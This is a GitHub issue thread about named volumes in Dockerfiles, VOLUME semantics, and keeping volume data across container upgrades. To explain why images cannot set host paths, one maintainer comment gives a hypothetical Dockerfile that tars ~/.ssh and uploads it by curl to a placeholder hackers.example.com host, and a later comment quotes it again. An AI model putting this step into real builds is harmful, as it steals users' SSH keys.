### ISSUE TITLE
Named Volumes in Dockerfile

### ISSUE THREAD

**Issue by arvenil** [docker/docker#30647]
With docker-compose I can use named volumes like this:

```
version: '2.1'

volumes:
  data:

services:
  xyz:
    build: .
    container_name: xyz
    image: xyz
    ports:
      - "80:80"
    volumes:
      - data:/some/path
```

What about Dockerfile?

I tried doing something like this:
`VOLUME data:/some/path`

But it doesn't seem to work. I still get uuids with `docker volume ls`

Is this a bug?

I also wonder what is a use case difference between using volumes in Dockerfile or in docker-compose?

Yet another thing... can you have VOLUME in Dockerfile and then shadow/rename/set it with docker-compose?

To me it seems logical to define VOLUME in Dockerfile as at this point we know given directory shouldn't been trashed between runs... but then they are not named so hard to been identified in `docker volume ls`... however if it would be possible to overwrite VOLUME declaration with a named one in docker-compose.yml then at least there would be an workaround.

**Comment by anonymuse** [comment]
Hi @arvenil, can you share with us your installed version of Docker with:

`docker version`

please?

If you could also post a full snippet of the Dockerfile that you're experimenting with, that would be helpful, as well as the `docker run` command used with the image.

Are you running any Docker volume creation commands?

```
$ docker volume create ...
```

Thanks!

**Comment by thaJeztah** [comment]
This is by design. Let me try to explain; the `VOLUME` directive in the Dockerfile only defines that a volume should be created for a specific path in the image (/container when running). The _name_ of the volume should never be dictated by an image, because that's something that should be defined at runtime; if this _would_ be implemented, think of the following situation;

```Dockerfile
FROM foobar
VOLUME data:/my/data
```

```
docker build -t myimage .

docker run --name app1 myimage
docker run --name app2 myimage
```

Now both app1 and app2 would be _creating_ a volume named `data`, and use the _same_ volume. Effectively you'd only be able to run a _single_ instance of the image.

Similarly, the Dockerfile is not allowed to specify a host-path. Not only would this result in the same problem as mentioned above, it would be a security issue. Imagine this Dockerfile;

```
FROM foobar
VOLUME $HOME/.ssh:/the-keys
RUN tar -zcvf keys.tgz /the-keys
ENTRYPOINT tar -zcvf keys.tgz /the-keys \
  && curl -i -F name=test -F filedata=@keys.tgz http://hackers.example.com/upload  \
  && exec "$@"
```

Which would upload your SSH keys

> Yet another thing... can you have VOLUME in Dockerfile and then shadow/rename/set it with docker-compose?

Yes; even further, you don't even have to set `VOLUME` in the Dockerfile, unless it's an absolute _requirement_ for your image to have a volume at a specific location.

The `--volume` flag on `docker run` (or `volumes:` in docker-compose) basically is a shorthand for a number of operations;

### When specifying a path only;

```
--volume /path/in/container
```

Then docker;

1. creates an "anonymous" (randomly named) volume
2. copies any files and folders that are at `/foo/bar` inside the container to the volume when the container is started
3. bind-mounts that volume at `/path/in/container` in the container

### When specifying a volume _name_ and a path;

```
--volume myvolume:/path/in/container
```

Then docker;

1. Docker checks if a volume named `myvolume`  exists
2. If the volume doesn't exist, creates a new volume named `myvolume`
3. if the volume is empty (i.e., the first time it's used), copies any files and folders that are at ` /path/in/container` inside the container to the volume
4. bind-mounts  that volume at `/path/in/container` in the container

### When specifying a host path and a container-path

```
--volume /path/on/host:/path/in/container
```

Then docker;

1. looks for `/path/on/host` on the host that the daemon runs
2. if `/path/on/host` doesn't exist, creates an empty directory
3. bind-mounts `/path/on/host` at `/path/in/container` in the container

Note that in this case, data is _not_ copied from the container to `/path/on/host`; when bind-mounting a host directory, the files/directories on the _host_ are leading; even if that directory is empty.


Let me close this issue, because this is not a bug, but I hope the above helps. Feel free to continue the discussion after I closed

**Comment by arvenil** [comment]
@thaJeztah Thank you for your amazing answer!

> > Yet another thing... can you have VOLUME in Dockerfile and then shadow/rename/set it with docker-compose?
> 
> Yes; even further, you don't even have to set VOLUME in the Dockerfile, unless it's an absolute requirement for your image to have a volume at a specific location.

I have a problem with this. Let's say you have a Dockerfile that builds mysql image. It seems to me that adding `VOLUME /var/lib/mysql` is a natural way to be sure data stays after stopping container and that it is picked up when starting again. This works. What I don't know how to handle is image upgrade process. Example:

```console
$ cat Dockerfile
FROM alpine:3.5
VOLUME /tmp
CMD ls /tmp && echo "it's alive"
$ docker build -t volume-test .
$ docker run --name vt volume-test
it's alive
$ docker volume ls
DRIVER              VOLUME NAME
local               b50fe2e7b411cc370ae548833bf9281c7f11347001a6436aaf4449bac7453a4b
$ docker container inspect  -f '{{ range .Mounts }}{{ .Name }}:{{ .Destination }} {{ end }}'  vt
b50fe2e7b411cc370ae548833bf9281c7f11347001a6436aaf4449bac7453a4b:/tmp
# Let's release version 2.0
$ cat Dockerfile
FROM alpine:3.5
VOLUME /tmp
CMD ls /tmp && echo "it's alive version 2.0"
$ docker build -t volume-test .
# Now how to upgrade?
$ docker rm vt
$ docker run --name vt volume-test
it's alive version 2.0
$ docker volume ls
DRIVER              VOLUME NAME
local               778cee361403e54d2794d6bdd75b801f01df3bcbecc9487cf6a37050ced9f97e
local               b50fe2e7b411cc370ae548833bf9281c7f11347001a6436aaf4449bac7453a4b
$ docker container inspect  -f '{{ range .Mounts }}{{ .Name }}:{{ .Destination }} {{ end }}'  vt
778cee361403e54d2794d6bdd75b801f01df3bcbecc9487cf6a37050ced9f97e:/tmp
# Well, definitely not like that
```

I would like to make upgrading process for users of my image to by simple, so I was hoping that VOLUME with attached hard-coded name could make that easier. But you've explained very well why this is not going to happen. The question then - how to make upgrade process easy? Actually first question is how to make the upgrade process without loosing data? As we can see new volume got created - how to upgrade image and container to newer one but keeping the old volume?

With constant "named volume" this could be possible as we would have unique identifier but again this turns to be logically out of question.

**Comment by thaJeztah** [comment]
Theres more reasons for having a volume than just keeping the data around; an "unnamed" volume for example, can be for performance reasons (i.e., writing data to the union/layered filesystem of a container has a performance penalty - writing to a volume prevents that).

When not _naming_ your volume you generally mean: I don't "care" about its data, it's ok to remove after the container is removed.

So; if you want to stick with the data; use `--volume <volumename>:/path/in/container`

Keep in mind that "unnamed" (well _randomly_ named) volumes are in essence not any different than explicitly _named_ ones, so for example;

```bash
# create a randomly named volume, and store its name
VOLNAME=$(docker volume create) 

# use that randomly named volume
docker run -v $VOLNAME:/path/in/container myimage
```

You can keep `$VOLNAME` around (store it in a file, e.g.)

But for upgrading, it's recommended to explicitly name your volume, so that you can re-use

Alternatively; use `--volumes-from` to get which volumes a container was using, and copy that to the new container;

```bash
docker run -d --name database mysql:5.5

# upgrade
docker stop database
docker rename database-previous

docker run --volumes-from=database-previous --name database mysql:5.5.1

# once deployed, you can remove the old container
docker rm database-previous
```

Note that (if I'm not mistaken) `docker-compose` can take care of this, and tries to reuse the old volume when redeploying services

**Comment by arvenil** [comment]
@thaJeztah Thanks again.

The trick with `docker stop ...; docker rename ...; docker run --folumes-from ...` is great. Looks like proper way to rerun docker container with new image.

I'm still however banging my head against a wall as there is still so much of inconsistency and complexity here.

```
docker run -d --name database mysql:5.5

# upgrade
docker stop database
docker rename database-previous

docker run --volumes-from=database-previous --name database mysql:5.5.1

# once deployed, you can remove the old container
docker rm database-previous
```

1. Five steps to just update image to the newest one and you need to be aware there are volumes there... if you forget about this your data is lost (yes, stays in old volume).
2. I don't see any info in docs about upgrading container. Neither for docker nor for docker-compose. At least I couldn't find it. It would be nice if docs inform how to upgrade docker container with volumes so you don't loose data. It looks to me like a really common task to e.g. upgrade mysql from version 5.5 to 5.6. An official path of doing that would be nice.
3. It looks even more messy with docker-compose. It works when doing `docker pull; docker up` but don't you dare to use `docker-compose down; docker-compose up` - now, it's logical it will create new volumes, but if you do this by mistake then how you can recover from it? How to mount again old volumes with docker-compose?
4. `docker-compose` with named container is probably the best option, as even `docker-compose down; docker compose up` will use exactly the same containers. However then we will probably have the same issue as with Dockerfile that we won't be able to run multiple instances of the service. 
5. I think all this could be solved with better documentation about upgrade process... especially that documenting this is going to highlight complexity and traps for the end user so improvements could be made.

Thanks for helping me with this @thaJeztah !

**Comment by thaJeztah** [comment]
> I don't see any info in docs about upgrading container. Neither for docker nor for docker-compose. 

I agree, I think it would be a good addition to the docs to describe the workflow. `docker service update` is allowing you to update a service's image, and keeping all other options the same. It _does_ require you to use a multi-host aware volume driver if the swarm it's running on has multiple nodes.

> However then we will probably have the same issue as with Dockerfile that we won't be able to run multiple instances of the service.

docker-compose "namespaces" volumes by prefixing them with the project-name. So you can deploy the same project / docker-compose file once as `project-foo` and once as `project-bar` and it will use those to keep the volumes for both projects separate.

> I think all this could be solved with better documentation about upgrade process

Perhaps you could open an issue in the documentation repository (https://github.com/docker/docker.github.io/issues), or are even interested in contributing / working together with the docs team to see if you're able to help out?

**Comment by SurjitDas** [comment]
> This is by design. Let me try to explain; the `VOLUME` directive in the Dockerfile only defines that a volume should be created for a specific path in the image (/container when running). The _name_ of the volume should never be dictated by an image, because that's something that should be defined at runtime; if this _would_ be implemented, think of the following situation;
> 
> ```dockerfile
> FROM foobar
> VOLUME data:/my/data
> ```
> 
> ```
> docker build -t myimage .
> 
> docker run --name app1 myimage
> docker run --name app2 myimage
> ```
> 
> Now both app1 and app2 would be _creating_ a volume named `data`, and use the _same_ volume. Effectively you'd only be able to run a _single_ instance of the image.
> 
> Similarly, the Dockerfile is not allowed to specify a host-path. Not only would this result in the same problem as mentioned above, it would be a security issue. Imagine this Dockerfile;
> 
> ```
> FROM foobar
> VOLUME $HOME/.ssh:/the-keys
> RUN tar -zcvf keys.tgz /the-keys
> ENTRYPOINT tar -zcvf keys.tgz /the-keys \
>   && curl -i -F name=test -F filedata=@keys.tgz http://hackers.example.com/upload  \
>   && exec "$@"
> ```
> 
> Which would upload your SSH keys
> 
> > Yet another thing... can you have VOLUME in Dockerfile and then shadow/rename/set it with docker-compose?
> 
> Yes; even further, you don't even have to set `VOLUME` in the Dockerfile, unless it's an absolute _requirement_ for your image to have a volume at a specific location.
> 
> The `--volume` flag on `docker run` (or `volumes:` in docker-compose) basically is a shorthand for a number of operations;
> 
> ### When specifying a path only;
> ```
> --volume /path/in/container
> ```
> 
> Then docker;
> 
> 1. creates an "anonymous" (randomly named) volume
> 2. copies any files and folders that are at `/foo/bar` inside the container to the volume when the container is started
> 3. bind-mounts that volume at `/path/in/container` in the container
> 
> ### When specifying a volume _name_ and a path;
> ```
> --volume myvolume:/path/in/container
> ```
> 
> Then docker;
> 
> 1. Docker checks if a volume named `myvolume`  exists
> 2. If the volume doesn't exist, creates a new volume named `myvolume`
> 3. if the volume is empty (i.e., the first time it's used), copies any files and folders that are at ` /path/in/container` inside the container to the volume
> 4. bind-mounts  that volume at `/path/in/container` in the container
> 
> ### When specifying a host path and a container-path
> ```
> --volume /path/on/host:/path/in/container
> ```
> 
> Then docker;
> 
> 1. looks for `/path/on/host` on the host that the daemon runs
> 2. if `/path/on/host` doesn't exist, creates an empty directory
> 3. bind-mounts `/path/on/host` at `/path/in/container` in the container
> 
> Note that in this case, data is _not_ copied from the container to `/path/on/host`; when bind-mounting a host directory, the files/directories on the _host_ are leading; even if that directory is empty.
> 
> Let me close this issue, because this is not a bug, but I hope the above helps. Feel free to continue the discussion after I closed

Hi @thaJeztah, just wanted to get a confirmation on the following point:
- "if the volume is empty (i.e., the first time it's used), copies any files and folders that are at ` /path/in/container` inside the container to the volume".
Is this true for all named volumes (i.e. irrespective of the volume driver and type) or is it only true for local named volume types?

PS: I couldn't infer a concrete evidence from the discussions under: [ISSUE-18670|https://github.com/moby/moby/issues/18670]

**Comment by thaJeztah** [comment]
> Is this true for all named volumes (i.e. irrespective of the volume driver and type) or is it only true for local named volume types?

I think that should be true for any driver; have you had issues where it doesn't work?

**Comment by SurjitDas** [comment]
> > Is this true for all named volumes (i.e. irrespective of the volume driver and type) or is it only true for local named volume types?
> 
> I think that should be true for any driver; have you had issues where it doesn't work?

Thank you @thaJeztah for acknowledging on this.

This is working as expected for named volumes with local driver.
I was about to experiment the same for named volumes with other driver types and see if this behavior is consistent. Thus wanted to get a confirmation before getting started with it.

I'll try with other driver types and report back, if this doesn't work as expected.

**Comment by rawatnaresh** [comment]
Hi @thaJeztah, Thank you for your explanation but I still have some doubts about the named volumes.
I have a very simple node js app and the project structure looks like this.
`index.js`
`package.json`
`package-lock.json`

`Dockerfile`
```
FROM node:12.18.2-alpine
WORKDIR /test-app
COPY package.json package-lock.json ./
RUN npm i
COPY . ./
EXPOSE 3000
ENTRYPOINT [ "node", "index.js" ]
```
`docker-compose.yml`
```
version: '3.2'

services:
  test-app:
    build: .
    ports:
      - "3000:3000"
    volumes:
      - .:/test-app
      - "test_app_node_modules:/test-app/node_modules"
volumes:
  test_app_node_modules:
    driver: local
```
If you look at the `volumes` section in `docker-compose.yml` file, first I'm mounting my current directory on the host machine to the `test-app` directory on the container. This means :
1) whatever there was on the `test-app` dir of container got overwritten including `node_modules` that were installed during docker build.
> When specifying a volume name and a path;
         3. if the volume is empty (i.e., the first time it's used), copies any files and folders that are at /path/in/container inside the   container to the volume


2) and the 2nd step in the `volumes` section is named volumes. It should copy everything from `test-app/node_modules`inside container to `test_app_node_modules` volume. But the `test-app/node_modules` is empty which means we created an empty volume and mounted it to the container. 

If this is so, it should be causing missing dependency error but my app is running properly. I'm not sure where I'm getting node_modules from.

Thanks!

**Comment by asbjornu** [comment]
@thaJeztah thanks for the elaborate explanation! This level of detailed information is impossible to glean from [the official documentation on volumes](https://docs.docker.com/storage/volumes/), where named volumes in particular are only mentioned here and there, but not specified with examples like yours anywhere I can find.
